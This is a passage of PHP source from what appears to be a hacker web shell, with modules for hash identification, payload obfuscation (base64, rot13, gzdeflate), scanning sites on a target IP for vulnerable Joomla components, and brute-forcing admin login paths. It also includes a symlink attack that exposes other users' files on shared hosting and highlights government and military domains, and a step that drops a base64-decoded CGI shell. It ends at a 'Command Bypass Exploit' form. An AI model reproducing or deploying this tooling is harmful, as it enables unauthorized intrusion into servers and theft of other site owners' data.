  1150. echo '<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value='.$hash1_sha1.'></td></tr><br><br>';
  1151. echo '<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value='.$hash1_sha1_double.'></td></tr><br><br></table>';
  1152. }
  1153. //////////////////////////////////////////////////////////////////////////////////////////////
  1154. elseif(isset($_GET['x']) && ($_GET['x'] == 'hashid')) {
  1155. if(isset($_POST['gethash'])){
  1156.                 $hash = $_POST['hash'];
  1157.                 if(strlen($hash)==32){
  1158.                         $hashresult = "MD5 Hash";
  1159.                 }elseif(strlen($hash)==40){
  1160.                         $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
  1161.                 }elseif(strlen($hash)==13){
  1162.                         $hashresult = "DES(Unix) Hash";
  1163.                 }elseif(strlen($hash)==16){
  1164.                         $hashresult = "MySQL Hash / /DES(Oracle Hash)";
  1165.                 }elseif(strlen($hash)==41){
  1166.                         $GetHashChar = substr($hash, 40);
  1167.                         if($GetHashChar == "*"){
  1168.                                 $hashresult = "MySQL5 Hash";
  1169.                         }      
  1170.                 }elseif(strlen($hash)==64){
  1171.                         $hashresult = "SHA-256 Hash";
  1172.                 }elseif(strlen($hash)==96){
  1173.                         $hashresult = "SHA-384 Hash";
  1174.                 }elseif(strlen($hash)==128){
  1175.                         $hashresult = "SHA-512 Hash";
  1176.                 }elseif(strlen($hash)==34){
  1177.                         if(strstr($hash, '$1$')){
  1178.                                 $hashresult = "MD5(Unix) Hash";
  1179.                         }      
  1180.                 }elseif(strlen($hash)==37){
  1181.                         if(strstr($hash, '$apr1$')){
  1182.                                 $hashresult = "MD5(APR) Hash";
  1183.                         }      
  1184.                 }elseif(strlen($hash)==34){
  1185.                         if(strstr($hash, '$H$')){
  1186.                                 $hashresult = "MD5(phpBB3) Hash";
  1187.                         }      
  1188.                 }elseif(strlen($hash)==34){
  1189.                         if(strstr($hash, '$P$')){
  1190.                                 $hashresult = "MD5(Wordpress) Hash";
  1191.                         }      
  1192.                 }elseif(strlen($hash)==39){
  1193.                         if(strstr($hash, '$5$')){
  1194.                                 $hashresult = "SHA-256(Unix) Hash";
  1195.                         }      
  1196.                 }elseif(strlen($hash)==39){
  1197.                         if(strstr($hash, '$6$')){
  1198.                                 $hashresult = "SHA-512(Unix) Hash";
  1199.                         }      
  1200.                 }elseif(strlen($hash)==24){
  1201.                         if(strstr($hash, '==')){
  1202.                                 $hashresult = "MD5(Base-64) Hash";
  1203.                         }      
  1204.                 }else{
  1205.                         $hashresult = "Hash type not found";
  1206.                 }
  1207.         }else{
  1208.                 $hashresult = "Not Hash Entered";
  1209.         }
  1210.        
  1211.         ?>
  1212.         <center><br><Br><br>
  1213.        
  1214.                 <form action="" method="POST">
  1215.                 <tr>
  1216.                 <table class="tabnet">
  1217.                 <th colspan="5">Hash Identification</th>
  1218.                 <tr class="optionstr"><B><td>Enter Hash</td></b><td>:</td>      <td><input type="text" name="hash" size='60' class="inputz" /></td><td><input type="submit" class="inputzbut" name="gethash" value="Identify Hash" /></td></tr>
  1219.                 <tr class="optionstr"><b><td>Result</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>
  1220.         </table></tr></form>
  1221.         </center>
  1222.        
  1223.         <?php
  1224.  }
  1225. //////////////////////////////////////////////////////////////////////////////////////////////
  1226. elseif(isset($_GET['x']) && ($_GET['x'] == 'string')){
  1227. $text = $_POST['code'];
  1228. ?><center><br><br><b>Script Encode and Decode</b><br><br>
  1229. <form method="post"><br><br><br>
  1230. <textarea class='inputz' cols=80 rows=10 name="code"></textarea><br><br>
  1231. <select class='inputz' size="1" name="ope">
  1232. <option value="base64">Base64</option>
  1233. <option value="gzinflate">str_rot13 - gzinflate - base64</option>
  1234. <option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>
  1235. </select>&nbsp;<input class='inputzbut' type='submit' name='submit' value='Encrypt'>
  1236. <input class='inputzbut' type='submit' name='submits' value='Decrypt'>
  1237. </form>
  1238.  
  1239. <?php
  1240. $submit = $_POST['submit'];
  1241. if (isset($submit)){
  1242. $op = $_POST["ope"];
  1243. switch ($op) {case 'base64': $codi=base64_encode($text);
  1244. break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
  1245. break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
  1246. break;default:break;}}
  1247.  
  1248. $submit = $_POST['submits'];
  1249. if (isset($submit)){
  1250. $op = $_POST["ope"];
  1251. switch ($op) {case 'base64': $codi=base64_decode($text);
  1252. break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
  1253. break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
  1254. break;default:break;}}
  1255.  
  1256. echo '<textarea cols=80 rows=10 class="inputz" readonly>'.$codi.'</textarea></center><BR><BR>';
  1257.  
  1258. }
  1259.    ////////////////////////////////////////////////////////
  1260.    elseif(isset($_GET['x']) && ($_GET['x'] == 'jss'))
  1261.     {
  1262.     ?>
  1263.     <form action="?y=<?php echo $pwd; ?>&x=jss" method="post">
  1264.     <?php
  1265.         echo '
  1266.  
  1267. <br><br><br><p align="center"><b><font size="3">Enter Targeting IP</font></b></p><br>
  1268. <form method="POST">
  1269.         <p align="center"><input type="text" class="inputz" name="site" size="65"><input class="inputzbut" type="submit" value="Scan"></p>
  1270. </form><center>
  1271.  
  1272. ';
  1273. @set_time_limit(0);
  1274. @error_reporting(E_ALL | E_NOTICE);
  1275.  
  1276. function check_exploit($comxx){
  1277.  
  1278. $link ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$comxx&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";
  1279.  
  1280. $result = @file_get_contents($link);
  1281.  
  1282. if (eregi("No results",$result))  {
  1283.  
  1284. echo"<td>Not Found</td><td><a href='http://www.google.com/#hl=en&q=download+$comxx+joomla+extension'>Download</a></td></tr>";
  1285.  
  1286. }else{
  1287.  
  1288. echo"<td><a href='$link'>Found</a></td><td><=</td></tr>";
  1289.  
  1290. }
  1291. }
  1292.  
  1293. function check_com($url){
  1294.  
  1295. $source = @file_get_contents($url);
  1296.  
  1297. preg_match_all('{option,(.*?)/}i',$source,$f);
  1298. preg_match_all('{option=(.*?)(&amp;|&|")}i',$source,$f2);
  1299. preg_match_all('{/components/(.*?)/}i',$source,$f3);
  1300.  
  1301. $arz=array_merge($f2[1],$f[1],$f3[1]);
  1302.  
  1303. $coms=array();
  1304.  
  1305. foreach(array_unique($arz) as $x){
  1306. $coms[]=$x;
  1307. }
  1308.  
  1309. foreach($coms as $comm){
  1310.  
  1311. echo "<tr><td>$comm</td>";
  1312. check_exploit($comm);
  1313. }
  1314.  
  1315. }
  1316.  
  1317. function sec($site){
  1318. preg_match_all('{http://(.*?)(/index.php)}siU',$site, $sites);
  1319. if(eregi("www",$sites[0][0])){
  1320. return $site=str_replace("index.php","",$sites[0][0]);
  1321. }else{
  1322. return $site=str_replace("http://","http://www.",str_replace("index.php","",$sites[0][0]));
  1323. }}
  1324.  
  1325. $npages = 50000;
  1326.  
  1327. if ($_POST)
  1328. {
  1329.   $ip = trim(strip_tags($_POST['site']));
  1330.   $npage = 1;
  1331.   $allLinks = array();
  1332.  
  1333.  
  1334.    while($npage <= $npages)
  1335.   {
  1336.  
  1337.   $x=@file_get_contents('http://www.bing.com/search?q=ip%3A' . $ip . '+index.php?option=com&first=' . $npage);
  1338.  
  1339.  
  1340.         if ($x)
  1341.         {
  1342.                 preg_match_all('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>siU', $x, $findlink);
  1343.              
  1344.                 foreach ($findlink[1] as $fl)
  1345.              
  1346.                 $allLinks[]=sec($fl);
  1347.              
  1348.              
  1349.                 $npage = $npage + 10;
  1350.              
  1351.                 if (preg_match('(first=' . $npage . '&amp)siU', $x, $linksuiv) == 0)
  1352.                         break;                    
  1353.         }
  1354.      
  1355.     else
  1356.                 break;
  1357.   }
  1358.  
  1359.  
  1360. $allDmns = array();
  1361.  
  1362. foreach ($allLinks as $kk => $vv){
  1363.  
  1364. $allDmns[] = $vv;
  1365. }
  1366.                      
  1367. echo'<table border="1"  width=\"80%\" align=\"center\">
  1368. <tr><td width=\"30%\"><b>Server IP&nbsp;&nbsp;&nbsp;&nbsp; : </b></td><td><b>'.$ip.'</b></td></tr>                    
  1369. <tr><td width=\"30%\"><b>Sites Found&nbsp; : </b></td><td><b>'.count(array_unique($allDmns)).'</b></td></tr>
  1370. </table>';
  1371. echo "<br><br>";
  1372.  
  1373. echo'<table border="1" width="80%" align=\"center\">';
  1374.  
  1375. foreach(array_unique($allDmns) as $h3h3){
  1376.  
  1377. echo'<tr id=new><td><b><a href='.$h3h3.'>'.$h3h3.'</a></b></td><td><b>Exploit-db</b></td><td><b>challenge of Exploiting ..!</b></td></tr>';
  1378.  
  1379. check_com($h3h3);
  1380.  
  1381. }
  1382.  
  1383. echo"</table>";
  1384.  
  1385. }
  1386. }
  1387. //////////////////////////////////////////////////////////////
  1388. elseif(isset($_GET['x']) && ($_GET['x'] == 'cms_detect'))
  1389.     {
  1390.     ?>
  1391.     <form action="?y=<?php echo $pwd; ?>&x=cms_detect" method="post">
  1392.         <br><br><br><br><center><b><font size=4>CMS Detector</font></b></center><br><br>
  1393.     <?php
  1394. if(!file_exists('pee.tmp')){
  1395. @fopen('pee.tmp', 'w');
  1396.  
  1397. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
  1398. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table>';
  1399.  
  1400. $p = 0;
  1401.  
  1402. if(is_readable("/var/named")){
  1403. $list = scandir("/var/named");
  1404. $current_dir = posix_getcwd();
  1405. $dir = explode("/",$current_dir);
  1406. foreach($list as $domain){
  1407. if(strpos($domain,".db"))
  1408. {
  1409.         $domain = str_replace('.db',',$domain);
  1410.         $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1411.        
  1412. error_reporting(0);
  1413.  
  1414. $link = $pageURL.'pee/'.$owner['name'];
  1415.  
  1416. cms_add($link,$domain,$owner['name'],"WordPress");
  1417. cms_add($link,$domain,$owner['name'],"Joomla");
  1418. cms_add($link,$domain,$owner['name'],"vBulletin");
  1419. cms_add($link,$domain,$owner['name'],"WHMCS");
  1420. cms_add($link,$domain,$owner['name'],"PhpBB");
  1421. cms_add($link,$domain,$owner['name'],"MyBB");
  1422. cms_add($link,$domain,$owner['name'],"IPB");
  1423. cms_add($link,$domain,$owner['name'],"SMF");
  1424. cms_add($link,$domain,$owner['name'],"Drupal");
  1425. cms_add($link,$domain,$owner['name'],"e107");
  1426. cms_add($link,$domain,$owner['name'],"Seditio");
  1427. cms_add($link,$domain,$owner['name'],"osCommerce");
  1428.  
  1429. }
  1430. }
  1431. }
  1432. }else{
  1433. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
  1434. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table><br><br>';
  1435. $content = file_get_contents($pageURL.'pee.tmp');
  1436. echo $content;
  1437. }
  1438. }
  1439. ////////////////////////////////////////////////////////////
  1440.  
  1441. elseif(isset($_GET['x']) && ($_GET['x'] == 'adfin'))
  1442. {      
  1443. ?>
  1444. <form action="?y=<?php echo $pwd; ?>&amp;x=adfin" method="post">
  1445.  
  1446. <?php
  1447. set_time_limit(0);
  1448. error_reporting(0);
  1449. $list['front'] ="admin
  1450. adm
  1451. admincp
  1452. admcp
  1453. cp
  1454. modcp
  1455. moderatorcp
  1456. adminare
  1457. admins
  1458. cpanel
  1459. controlpanel";
  1460. $list['end'] = "admin1.php
  1461. admin1.html
  1462. admin2.php
  1463. admin2.html
  1464. yonetim.php
  1465. yonetim.html
  1466. yonetici.php
  1467. yonetici.html
  1468. ccms/
  1469. ccms/login.php
  1470. ccms/index.php
  1471. maintenance/
  1472. webmaster/
  1473. adm/
  1474. configuration/
  1475. configure/
  1476. websvn/
  1477. admin/
  1478. admin/account.php
  1479. admin/account.html
  1480. admin/index.php
  1481. admin/index.html
  1482. admin/login.php
  1483. admin/login.html
  1484. admin/home.php
  1485. admin/controlpanel.html
  1486. admin/controlpanel.php
  1487. admin.php
  1488. admin.html
  1489. admin/cp.php
  1490. admin/cp.html
  1491. cp.php
  1492. cp.html
  1493. administrator/
  1494. administrator/index.html
  1495. administrator/index.php
  1496. administrator/login.html
  1497. administrator/login.php
  1498. administrator/account.html
  1499. administrator/account.php
  1500. administrator.php
  1501. administrator.html
  1502. login.php
  1503. login.html
  1504. modelsearch/login.php
  1505. moderator.php
  1506. moderator.html
  1507. moderator/login.php
  1508. moderator/login.html
  1509. moderator/admin.php
  1510. moderator/admin.html
  1511. moderator/
  1512. account.php
  1513. account.html
  1514. controlpanel/
  1515. controlpanel.php
  1516. controlpanel.html
  1517. admincontrol.php
  1518. admincontrol.html
  1519. adminpanel.php
  1520. adminpanel.html
  1521. admin1.asp
  1522. admin2.asp
  1523. yonetim.asp
  1524. yonetici.asp
  1525. admin/account.asp
  1526. admin/index.asp
  1527. admin/login.asp
  1528. admin/home.asp
  1529. admin/controlpanel.asp
  1530. admin.asp
  1531. admin/cp.asp
  1532. cp.asp
  1533. administrator/index.asp
  1534. administrator/login.asp
  1535. administrator/account.asp
  1536. administrator.asp
  1537. login.asp
  1538. modelsearch/login.asp
  1539. moderator.asp
  1540. moderator/login.asp
  1541. moderator/admin.asp
  1542. account.asp
  1543. controlpanel.asp
  1544. admincontrol.asp
  1545. adminpanel.asp
  1546. fileadmin/
  1547. fileadmin.php
  1548. fileadmin.asp
  1549. fileadmin.html
  1550. administration/
  1551. administration.php
  1552. administration.html
  1553. sysadmin.php
  1554. sysadmin.html
  1555. phpmyadmin/
  1556. myadmin/
  1557. sysadmin.asp
  1558. sysadmin/
  1559. ur-admin.asp
  1560. ur-admin.php
  1561. ur-admin.html
  1562. ur-admin/
  1563. Server.php
  1564. Server.html
  1565. Server.asp
  1566. Server/
  1567. wp-admin/
  1568. administr8.php
  1569. administr8.html
  1570. administr8/
  1571. administr8.asp
  1572. webadmin/
  1573. webadmin.php
  1574. webadmin.asp
  1575. webadmin.html
  1576. administratie/
  1577. admins/
  1578. admins.php
  1579. admins.asp
  1580. admins.html
  1581. administrivia/
  1582. Database_Administration/
  1583. WebAdmin/
  1584. useradmin/
  1585. sysadmins/
  1586. admin1/
  1587. system-administration/
  1588. administrators/
  1589. pgadmin/
  1590. directadmin/
  1591. staradmin/
  1592. ServerAdministrator/
  1593. SysAdmin/
  1594. administer/
  1595. LiveUser_Admin/
  1596. sys-admin/
  1597. typo3/
  1598. panel/
  1599. cpanel/
  1600. cPanel/
  1601. cpanel_file/
  1602. platz_login/
  1603. rcLogin/
  1604. blogindex/
  1605. formslogin/
  1606. autologin/
  1607. support_login/
  1608. meta_login/
  1609. manuallogin/
  1610. simpleLogin/
  1611. loginflat/
  1612. utility_login/
  1613. showlogin/
  1614. memlogin/
  1615. members/
  1616. login-redirect/
  1617. sub-login/
  1618. wp-login/
  1619. login1/
  1620. dir-login/
  1621. login_db/
  1622. xlogin/
  1623. smblogin/
  1624. customer_login/
  1625. UserLogin/
  1626. login-us/
  1627. acct_login/
  1628. admin_area/
  1629. bigadmin/
  1630. project-admins/
  1631. phppgadmin/
  1632. pureadmin/
  1633. sql-admin/
  1634. radmind/
  1635. openvpnadmin/
  1636. wizmysqladmin/
  1637. vadmind/
  1638. ezsqliteadmin/
  1639. hpwebjetadmin/
  1640. newsadmin/
  1641. adminpro/
  1642. Lotus_Domino_Admin/
  1643. bbadmin/
  1644. vmailadmin/
  1645. Indy_admin/
  1646. ccp14admin/
  1647. irc-macadmin/
  1648. banneradmin/
  1649. sshadmin/
  1650. phpldapadmin/
  1651. macadmin/
  1652. administratoraccounts/
  1653. admin4_account/
  1654. admin4_colon/
  1655. radmind-1/
  1656. Super-Admin/
  1657. AdminTools/
  1658. cmsadmin/
  1659. SysAdmin2/
  1660. globes_admin/
  1661. cadmins/
  1662. phpSQLiteAdmin/
  1663. navSiteAdmin/
  1664. server_admin_small/
  1665. logo_sysadmin/
  1666. server/
  1667. database_administration/
  1668. power_user/
  1669. system_administration/
  1670. ss_vms_admin_sm/
  1671. adminarea/
  1672. bb-admin/
  1673. adminLogin/
  1674. panel-administracion/
  1675. instadmin/
  1676. memberadmin/
  1677. administratorlogin/
  1678. admin/admin.php
  1679. admin_area/admin.php
  1680. admin_area/login.php
  1681. siteadmin/login.php
  1682. siteadmin/index.php
  1683. siteadmin/login.html
  1684. admin/admin.html
  1685. admin_area/index.php
  1686. bb-admin/index.php
  1687. bb-admin/login.php
  1688. bb-admin/admin.php
  1689. admin_area/login.html
  1690. admin_area/index.html
  1691. admincp/index.asp
  1692. admincp/login.asp
  1693. admincp/index.html
  1694. webadmin/index.html
  1695. webadmin/admin.html
  1696. webadmin/login.html
  1697. admin/admin_login.html
  1698. admin_login.html
  1699. panel-administracion/login.html
  1700. nsw/admin/login.php
  1701. webadmin/login.php
  1702. admin/admin_login.php
  1703. admin_login.php
  1704. admin_area/admin.html
  1705. pages/admin/admin-login.php
  1706. admin/admin-login.php
  1707. admin-login.php
  1708. bb-admin/index.html
  1709. bb-admin/login.html
  1710. bb-admin/admin.html
  1711. admin/home.html
  1712. pages/admin/admin-login.html
  1713. admin/admin-login.html
  1714. admin-login.html
  1715. admin/adminLogin.html
  1716. adminLogin.html
  1717. home.html
  1718. rcjakar/admin/login.php
  1719. adminarea/index.html
  1720. adminarea/admin.html
  1721. webadmin/index.php
  1722. webadmin/admin.php
  1723. user.html
  1724. modelsearch/login.html
  1725. adminarea/login.html
  1726. panel-administracion/index.html
  1727. panel-administracion/admin.html
  1728. modelsearch/index.html
  1729. modelsearch/admin.html
  1730. admincontrol/login.html
  1731. adm/index.html
  1732. adm.html
  1733. user.php
  1734. panel-administracion/login.php
  1735. wp-login.php
  1736. adminLogin.php
  1737. admin/adminLogin.php
  1738. home.php
  1739. adminarea/index.php
  1740. adminarea/admin.php
  1741. adminarea/login.php
  1742. panel-administracion/index.php
  1743. panel-administracion/admin.php
  1744. modelsearch/index.php
  1745. modelsearch/admin.php
  1746. admincontrol/login.php
  1747. adm/admloginuser.php
  1748. admloginuser.php
  1749. admin2/login.php
  1750. admin2/index.php
  1751. adm/index.php
  1752. adm.php
  1753. affiliate.php
  1754. adm_auth.php
  1755. memberadmin.php
  1756. administratorlogin.php
  1757. admin/admin.asp
  1758. admin_area/admin.asp
  1759. admin_area/login.asp
  1760. admin_area/index.asp
  1761. bb-admin/index.asp
  1762. bb-admin/login.asp
  1763. bb-admin/admin.asp
  1764. pages/admin/admin-login.asp
  1765. admin/admin-login.asp
  1766. admin-login.asp
  1767. user.asp
  1768. webadmin/index.asp
  1769. webadmin/admin.asp
  1770. webadmin/login.asp
  1771. admin/admin_login.asp
  1772. admin_login.asp
  1773. panel-administracion/login.asp
  1774. adminLogin.asp
  1775. admin/adminLogin.asp
  1776. home.asp
  1777. adminarea/index.asp
  1778. adminarea/admin.asp
  1779. adminarea/login.asp
  1780. panel-administracion/index.asp
  1781. panel-administracion/admin.asp
  1782. modelsearch/index.asp
  1783. modelsearch/admin.asp
  1784. admincontrol/login.asp
  1785. adm/admloginuser.asp
  1786. admloginuser.asp
  1787. admin2/login.asp
  1788. admin2/index.asp
  1789. adm/index.asp
  1790. adm.asp
  1791. affiliate.asp
  1792. adm_auth.asp
  1793. memberadmin.asp
  1794. administratorlogin.asp
  1795. siteadmin/login.asp
  1796. siteadmin/index.asp
  1797. login/
  1798. cms/
  1799. admon/
  1800. ADMIN/
  1801. paneldecontrol/
  1802. ADMON/
  1803. administrador/
  1804. ADMIN/login.php
  1805. ADMIN/login.html";
  1806. function template() {
  1807. echo '
  1808.  
  1809. panelc/
  1810. <script type="text/javascript">
  1811. <!--
  1812. function insertcode($text, $place, $replace)
  1813. {
  1814.     var $this = $text;
  1815.     var logbox = document.getElementById($place);
  1816.     if($replace == 0)
  1817.         document.getElementById($place).innerHTML = logbox.innerHTML+$this;
  1818.     else
  1819.         document.getElementById($place).innerHTML = $this;
  1820. //document.getElementById("helpbox").innerHTML = $this;
  1821. }
  1822. -->
  1823. </script>
  1824. <br>
  1825. <br>
  1826. <h1 class="technique-two">
  1827.        
  1828.  
  1829.  
  1830. </h1>
  1831.  
  1832. <div class="wrapper">
  1833. <div class="red">
  1834. <div class="tube">
  1835. <center><table class="tabnet"><th colspan="2">Admin Finder</th><tr><td>
  1836. <form action="" method="post" name="xploit_form">
  1837.  
  1838. <tr>
  1839. <tr>
  1840.         <b><td>URL</td>
  1841.         <td><input class="inputz" type="text" name="xploit_url" value="'.$_POST['xploit_url'].'" style="width: 350px;" />
  1842.         </td>
  1843. </tr><tr>
  1844.         <td>404 string</td>
  1845.         <td><input class="inputz" type="text" name="xploit_404string" value="'.$_POST['xploit_404string'].'" style="width: 350px;" />
  1846.         </td></b>
  1847. </tr><br><td>
  1848. <span style="float: center;"><input class="inputzbut" type="submit" name="xploit_submit" value=" Start Scan" align="center" />
  1849. </span></td></tr>
  1850. </form></td></tr>
  1851. <br /></table>
  1852. </div> <!-- /tube -->
  1853. </div> <!-- /red -->
  1854. <br />
  1855. <div class="green">
  1856. <div class="tube" id="rightcol">
  1857. Verificat: <span id="verified">0</span> / <span id="total">0</span><br />
  1858. <b>Found ones:<br /></b>
  1859. </div> <!-- /tube -->
  1860. </div></center><!-- /green -->
  1861. <br clear="all" /><br />
  1862. <div class="blue">
  1863. <div class="tube" id="logbox">
  1864. <br />
  1865. <br />
  1866. Admin page Finder :<br /><br />
  1867. </div> <!-- /tube -->
  1868. </div> <!-- /blue -->
  1869. </div> <!-- /wrapper -->
  1870. <br clear="all"><br>';
  1871. }
  1872. function show($msg, $br=1, $stop=0, $place='logbox', $replace=0) {
  1873.     if($br == 1) $msg .= "<br />";
  1874.     echo "<script type=\"text/javascript\">insertcode('".$msg."', '".$place."', '".$replace."');</script>";
  1875.     if($stop == 1) exit;
  1876.     @flush();@ob_flush();
  1877. }
  1878. function check($x, $front=0) {
  1879.     global $_POST,$site,$false;
  1880.     if($front == 0) $t = $site.$x;
  1881.     else $t = 'http://'.$x.'.'.$site.'/';
  1882.     $headers = get_headers($t);
  1883.     if (!eregi('200', $headers[0])) return 0;
  1884.     $data = @file_get_contents($t);
  1885.     if($_POST['xploit_404string'] == "") if($data == $false) return 0;
  1886.     if($_POST['xploit_404string'] != "") if(strpos($data, $_POST['xploit_404string'])) return 0;
  1887.     return 1;
  1888. }
  1889.    
  1890. // --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  1891. template();
  1892. if(!isset($_POST['xploit_url'])) die;
  1893. if($_POST['xploit_url'] == ') die;
  1894. $site = $_POST['xploit_url'];
  1895. if ($site[strlen($site)-1] != "/") $site .= "/";
  1896. if($_POST['xploit_404string'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
  1897. $list['end'] = str_replace("\r", "", $list['end']);
  1898. $list['front'] = str_replace("\r", "", $list['front']);
  1899. $pathes = explode("\n", $list['end']);
  1900. $frontpathes = explode("\n", $list['front']);
  1901. show(count($pathes)+count($frontpathes), 1, 0, 'total', 1);
  1902. $verificate = 0;
  1903. foreach($pathes as $path) {
  1904.     show('Checking '.$site.$path.' : ', 0, 0, 'logbox', 0);
  1905.     $verificate++; show($verificate, 0, 0, 'verified', 1);
  1906.     if(check($path) == 0) show('not found', 1, 0, 'logbox', 0);
  1907.     else{
  1908.         show('<span style="color: #00FF00;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
  1909.         show('<a href="'.$site.$path.'">'.$site.$path.'</a>', 1, 0, 'rightcol', 0);
  1910.     }
  1911. }
  1912. preg_match("/\/\/(.*?)\//i", $site, $xx); $site = $xx[1];
  1913. if(substr($site, 0, 3) == "www") $site = substr($site, 4);
  1914. foreach($frontpathes as $frontpath) {
  1915.     show('Checking http://'.$frontpath.'.'.$site.'/ : ', 0, 0, 'logbox', 0);
  1916.     $verificate++; show($verificate, 0, 0, 'verified', 1);
  1917.     if(check($frontpath, 1) == 0) show('not found', 1, 0, 'logbox', 0);
  1918.     else{
  1919.         show('<span style="color: #00FF00;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
  1920.         show('<a href="http://'.$frontpath.'.'.$site.'/">'.$frontpath.'.'.$site.'</a>', 1, 0, 'rightcol', 0);
  1921.     }
  1922.    
  1923. }
  1924. }
  1925.  
  1926. /////////////////////////////////////////////////////
  1927. elseif(isset($_GET['x']) && ($_GET['x'] == 'symlink'))
  1928. {      
  1929. ?>
  1930. <form action="?y=<?php echo $pwd; ?>&amp;x=symlink" method="post">
  1931.  
  1932. <?php  
  1933.  
  1934. @set_time_limit(0);
  1935.  
  1936. echo "<br><br><center><h1>+--=[ Symlink ]=--+</h1></center><br><br><center><div class=content>";
  1937.  
  1938. @mkdir('sym',0777);
  1939. $htaccess  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  1940. $write =@fopen ('sym/.htaccess','w');
  1941. fwrite($write ,$htaccess);
  1942. @symlink('/','sym/root');
  1943. $filelocation = basename(__FILE__);
  1944. $read_named_conf = @file('/etc/named.conf');
  1945. if(!$read_named_conf)
  1946. {
  1947. echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
  1948. }
  1949. else
  1950. {
  1951. echo "<br><br><div class='tmp'><table border='1' bordercolor='#00ff00' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>";
  1952. foreach($read_named_conf as $subject){
  1953. if(eregi('zone',$subject)){
  1954. preg_match_all('#zone "(.*)"#',$subject,$string);
  1955. flush();
  1956. if(strlen(trim($string[1][0])) >2){
  1957. $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
  1958. $name = $UID['name'] ;
  1959. @symlink('/','sym/root');
  1960. $name   = $string[1][0];
  1961. $iran   = '\.ir';
  1962. $israel = '\.il';
  1963. $indo   = '\.id';
  1964. $sg12   = '\.sg';
  1965. $edu    = '\.edu';
  1966. $gov    = '\.gov';
  1967. $gose   = '\.go';
  1968. $gober  = '\.gob';
  1969. $mil1   = '\.mil';
  1970. $mil2   = '\.mi';
  1971. $malay  = '\.my';
  1972. $china  = '\.cn';
  1973. $japan  = '\.jp';
  1974. $austr  = '\.au';
  1975. $porn   = '\.xxx';
  1976. $as             = '\.uk';
  1977. $calfn  = '\.ca';
  1978.  
  1979. if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])
  1980. or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0])
  1981. or eregi ("$malay",$string[1][0]) or eregi("$china",$string[1][0]) or eregi("$japan",$string[1][0]) or eregi ("$austr",$string[1][0])
  1982. or eregi("$porn",$string[1][0]) or eregi("$as",$string[1][0]) or eregi ("$calfn",$string[1][0]))
  1983. {
  1984. $name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>';
  1985. }
  1986. echo "
  1987. <tr>
  1988.  
  1989. <td>
  1990. <div class='dom'><a target='_blank' href=http://www.".$string[1][0].'/>'.$name.' </a> </div>
  1991. </td>
  1992.  
  1993. <td>
  1994. '.$UID['name']."
  1995. </td>
  1996.  
  1997. <td>
  1998. <a href='sym/root/home/".$UID['name']."/public_html' target='_blank'>Symlink </a>
  1999. </td>
  2000.  
  2001. </tr></div> ";
  2002. flush();
  2003. }
  2004. }
  2005. }
  2006. }
  2007.  
  2008. echo "</center></table>";  
  2009.  
  2010. }
  2011.  
  2012. /////////////////////////////////////////////////////
  2013. elseif(isset($_GET['x']) && ($_GET['x'] == 'config'))
  2014. {      
  2015. ?>
  2016. <form action="?y=<?php echo $pwd; ?>&amp;x=config" method="post">
  2017.  
  2018. <?php
  2019.  
  2020. echo "<center/><br/><b><font color=#00ff00>ConfigShell by Nabilaholic</font></b><br><br>";
  2021.  
  2022.   mkdir('config', 0755);
  2023.     chdir('config');
  2024.         $kokdosya = ".htaccess";
  2025.         $dosya_adi = "$kokdosya";
  2026.         $dosya = fopen ($dosya_adi , 'w') or die ("Error cuyy!");
  2027.         $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
  2028.                
  2029. AddType application/x-httpd-cgi .cpc
  2030.  
  2031. AddHandler cgi-script .izo
  2032. AddHandler cgi-script .izo";    
  2033.         fwrite ( $dosya , $metin ) ;
  2034.         fclose ($dosya);
  2035.  
  2036. $file = fopen("config.izo" ,"w+");
  2037. $write = fwrite ($file ,base64_decode($configshell));
  2038. fclose($file);
  2039.     chmod("config.izo",0755);
  2040.    echo "<iframe src=config/config.izo width=97% height=100% frameborder=0></iframe>
  2041.    </div>";
  2042. }
  2043. ///////////////////////////////////////////////////////
  2044. elseif(isset($_GET['x']) && ($_GET['x'] == 'bypass'))
  2045. {
  2046. ?>
  2047. <form action="?y=<?php echo $pwd; ?>&amp;x=bypass" method="post">
  2048.  
  2049. <?php
  2050. echo "<center/><br/><b><font color=#00ff00>-=[ Command  Bypass Exploit ]=-</font></b><br>
  2051. ";
  2052. print_r('
  2053. <pre>
  2054. <form method="POST" action="">
